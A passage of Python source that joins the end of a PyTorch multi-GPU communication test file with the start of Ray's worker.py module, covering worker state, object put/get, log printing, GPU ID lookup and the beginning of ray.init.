self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
worker.py
|
from contextlib import contextmanager
import colorama
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Dict, List, Iterator
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray.gcs_utils
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.services as services
import ray._private.runtime_env as runtime_env
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
import ray
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
from ray import profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import _random_string, check_oversized_pickle
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
UTIL_WORKER_MODE = 5
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed, record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job has finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number is incremented
# every time `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return json.loads(
self.core_worker.get_job_config().runtime_env.raw_json)
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
# called by `register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
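# Illustrative usage (hedged sketch, not part of this class's API): callers normally do not set
# the mode directly. LOCAL_MODE, for example, is typically requested through ray.init, e.g.
#
#     import ray
#     ray.init(local_mode=True)  # tasks run serially in-process, which helps debugging
#
# and the worker's mode is then set for you as part of startup.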
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value, object_ref=object_ref))
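# Illustrative usage (hedged sketch): the usual entry point into this code path is ray.put,
# e.g.
#
#     ref = ray.put({"answer": 42})          # stores the value in the object store
#     assert ray.get(ref) == {"answer": 42}  # retrieves it again
#
# Passing an ObjectRef to ray.put raises TypeError, as enforced above.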
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time, which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function,
run_on_other_drivers=False):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
run_on_other_drivers: A boolean indicating whether this function
should also run on other drivers. One use case is sharing
objects across drivers.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_pickle(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
"run_on_other_drivers": str(run_on_other_drivers),
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
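# Illustrative usage (hedged sketch): a typical caller passes a function that accepts the
# worker-info dict, e.g.
#
#     def _report_pid(worker_info):
#         print("worker pid:", os.getpid())
#
#     global_worker.run_function_on_all_workers(_report_pid)
#
# The function runs once on the driver immediately and is then exported to run on all workers.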
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(ray.gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@client_mode_hook
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
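    For illustration, a minimal sketch (assuming Ray was initialized on a
    node with at least one GPU):
    .. code-block:: python
        @ray.remote(num_gpus=1)
        def use_gpu():
            # e.g. returns [0] for the GPU assigned to this task.
            return ray.get_gpu_ids()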
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
if resource == "GPU" or resource.startswith("GPU_group_"):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@client_mode_hook
def init(
address=None,
*,
num_cpus=None,
num_gpus=None,
resources=None,
object_store_memory=None,
local_mode=False,
ignore_reinit_error=False,
include_dashboard=None,
dashboard_host=ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port=None,
job_config=None,
configure_logging=True,
logging_level=logging.INFO,
logging_format=ray_constants.LOGGER_FORMAT,
log_to_driver=True,
namespace=None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction=False,
_redis_max_memory=None,
_plasma_directory=None,
_node_ip_address=ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory=None,
_memory=None,
_redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir=None,
_lru_evict=False,
